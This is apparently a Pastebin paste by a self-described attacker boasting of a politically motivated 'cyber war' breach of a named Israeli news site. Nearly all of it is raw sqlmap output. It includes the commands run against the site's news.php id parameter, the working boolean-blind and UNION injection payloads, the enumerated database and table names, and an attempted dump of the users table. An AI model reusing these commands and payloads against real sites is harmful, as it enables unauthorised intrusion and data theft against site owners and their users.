Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- Fucked Database of www.albayan.co.il
- Israeli Site
- Cyber War
- ======= By JM511 From Saudi Arabia ==========
- Follow me : @JM511
- Greeting to : @in3ctor
- ==============================================
- available databases [2]:
- [*] albayan_db
- [*] information_schema
- [16:42:21] [INFO] fetched data logged to text files under '/pentest/database/sqlmap/output/www.albayan.co.il'
- [*] shutting down at 16:42:21
- root@bt:/pentest/database/sqlmap# ./sqlmap.py -u http://www.albayan.co.il/news.php?id=307 -D albayan_db --tables
- sqlmap/1.0-dev-25eca9d - automatic SQL injection and database takeover tool
- http://sqlmap.org
- [!] legal disclaimer: usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Authors assume no liability and are not responsible for any misuse or damage caused by this program
- [*] starting at 17:10:26
- [17:10:26] [INFO] resuming back-end DBMS 'mysql'
- [17:10:36] [INFO] testing connection to the target url
- [17:11:17] [CRITICAL] connection timed out to the target url or proxy, sqlmap is going to retry the request
- [17:11:17] [WARNING] if the problem persists please check that the provided target url is valid. If it is, you can try to rerun with the switch '--random-agent' turned on and/or proxy switches (--ignore-proxy, --proxy,...)
- sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
- ---
- Place: GET
- Parameter: id
- Type: boolean-based blind
- Title: AND boolean-based blind - WHERE or HAVING clause
- Payload: id=307 AND 1884=1884
- Type: UNION query
- Title: MySQL UNION query (NULL) - 18 columns
- Payload: id=307 LIMIT 1,1 UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, CONCAT(0x3a786f793a,0x504473674a6e527a4753,0x3a6e6c793a), NULL, NULL, NULL#
- ---
- [17:11:18] [INFO] the back-end DBMS is MySQL
- web application technology: PHP 5.2.17
- back-end DBMS: MySQL 5
- [17:11:18] [INFO] fetching tables for database: 'albayan_db'
- [17:11:20] [WARNING] reflective value(s) found and filtering out
- [17:11:20] [WARNING] in case of continuous data retrieval problems you are advised to try a switch '--no-cast' and/or switch '--hex'
- [17:11:20] [INFO] fetching number of tables for database 'albayan_db'
- [17:11:20] [WARNING] running in a single-thread mode. Please consider usage of option '--threads' for faster data retrieval
- [17:11:20] [INFO] retrieved:
- [17:11:31] [CRITICAL] unable to connect to the target url or proxy, sqlmap is going to retry the request
- 1
- [17:12:07] [CRITICAL] connection timed out to the target url or proxy, sqlmap is going to retry the request
- 4
- [17:12:19] [INFO] retrieved: adv
- [17:12:52] [INFO] retrieved: ca
- [17:13:44] [CRITICAL] connection timed out to the target url or proxy, sqlmap is going to retry the request
- t
- [17:14:33] [CRITICAL] connection timed out to the target url or proxy, sqlmap is going to retry the request
- eg
- [17:16:08] [CRITICAL] connection timed out to the target url or proxy, sqlmap is going to retry the request
- ory
- [17:16:51] [INFO] retrieved: commet
- [17:18:43] [CRITICAL] connection timed out to the target url or proxy, sqlmap is going to retry the request
- [17:19:14] [CRITICAL] connection timed out to the target url or proxy, sqlmap is going to retry the request
- s
- [17:19:29] [INFO] retrieved: headlines_
- [17:22:59] [CRITICAL] connection timed out to the target url or proxy, sqlmap is going to retry the request
- [17:23:35] [CRITICAL] unable to connect to the target url or proxy, sqlmap is going to retry the request
- categorys
- [17:25:32] [INFO] retrieved: headli
- [17:26:01] [CRITICAL] unable to connect to the target url or proxy, sqlmap is going to retry the request
- nes_news
- [17:27:02] [INFO] retrieved: poll
- [17:27:27] [INFO] retrieved: pollip
- [17:27:47] [INFO] retrieved: products
- [17:28:58] [INFO] retrieved: songs
- [17:30:01] [INFO] retrieved: swf_adv
- [17:30:45] [INFO] retrieved: users
- [17:31:38] [INFO] retrieved: video
- [17:32:18] [INFO] retrieved: video_menu
- [17:32:58] [INFO] retrieved: websites
- Database: albayan_db
- [14 tables]
- +---------------------+
- | adv |
- | category |
- | commets |
- | headlines_categorys |
- | headlines_news |
- | poll |
- | pollip |
- | products |
- | songs |
- | swf_adv |
- | users |
- | video |
- | video_menu |
- | websites |
- +---------------------+
- [17:34:01] [INFO] fetched data logged to text files under '/pentest/database/sqlmap/output/www.albayan.co.il'
- [*] shutting down at 17:34:01
- root@bt:/pentest/database/sqlmap# ./sqlmap.py -u http://www.albayan.co.il/news.php?id=307 -D albayan_db -T users --dump
- sqlmap/1.0-dev-25eca9d - automatic SQL injection and database takeover tool
- http://sqlmap.org
- [!] legal disclaimer: usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Authors assume no liability and are not responsible for any misuse or damage caused by this program
- [*] starting at 17:49:56
- [17:49:56] [INFO] resuming back-end DBMS 'mysql'
- [17:50:06] [INFO] testing connection to the target url
- sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
- ---
- Place: GET
- Parameter: id
- Type: boolean-based blind
- Title: AND boolean-based blind - WHERE or HAVING clause
- Payload: id=307 AND 1884=1884
- Type: UNION query
- Title: MySQL UNION query (NULL) - 18 columns
- Payload: id=307 LIMIT 1,1 UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, CONCAT(0x3a786f793a,0x504473674a6e527a4753,0x3a6e6c793a), NULL, NULL, NULL#
- ---
- [17:50:17] [INFO] the back-end DBMS is MySQL
- web application technology: PHP 5.2.17
- back-end DBMS: MySQL 5
- [17:50:17] [INFO] fetching columns for table 'users' in database 'albayan_db'
- [17:50:18] [WARNING] reflective value(s) found and filtering out
- [17:50:18] [WARNING] in case of continuous data retrieval problems you are advised to try a switch '--no-cast' and/or switch '--hex'
- [17:50:18] [ERROR] unable to retrieve the columns for any table in database 'albayan_db'
- do you want to use common column existence check? [y/N/q] y
- [17:50:21] [INFO] checking column existence using items from '/pentest/database/sqlmap/txt/common-columns.txt'
- [17:50:21] [INFO] adding words used on web page to the check list
- please enter number of threads? [Enter for 1 (current)] 9
- [17:50:24] [INFO] starting 9 threads
- [17:50:27] [INFO] retrieved: userid
- [17:50:46] [INFO] retrieved: password
- [17:51:31] [INFO] retrieved: user
- [17:55:42] [INFO] fetching entries for table 'users' in database 'albayan_db'
- Database: albayan_db
- Table: users
- [0 entries]
- +--------+------+----------+
- | userid | user | password |
- +--------+------+----------+
- +--------+------+----------+
- [17:55:43] [INFO] table 'albayan_db.users' dumped to CSV file '/pentest/database/sqlmap/output/www.albayan.co.il/dump/albayan_db/users.csv'
- [17:55:43] [INFO] fetched data logged to text files under '/pentest/database/sqlmap/output/www.albayan.co.il'
- [*] shutting down at 17:55:43
- root@bt:/pentest/database/sqlmap# ./sqlmap.py -u http://www.albayan.co.il/news.php?id=307 -D albayan_db -T websites --dump
- sqlmap/1.0-dev-25eca9d - automatic SQL injection and database takeover tool
- http://sqlmap.org
- [!] legal disclaimer: usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Authors assume no liability and are not responsible for any misuse or damage caused by this program
- [*] starting at 18:08:31
- [18:08:31] [INFO] resuming back-end DBMS 'mysql'
- [18:08:41] [INFO] testing connection to the target url
- sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
- ---
- Place: GET
- Parameter: id
- Type: boolean-based blind
- Title: AND boolean-based blind - WHERE or HAVING clause
- Payload: id=307 AND 1884=1884
- Type: UNION query
- Title: MySQL UNION query (NULL) - 18 columns
- Payload: id=307 LIMIT 1,1 UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, CONCAT(0x3a786f793a,0x504473674a6e527a4753,0x3a6e6c793a), NULL, NULL, NULL#
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement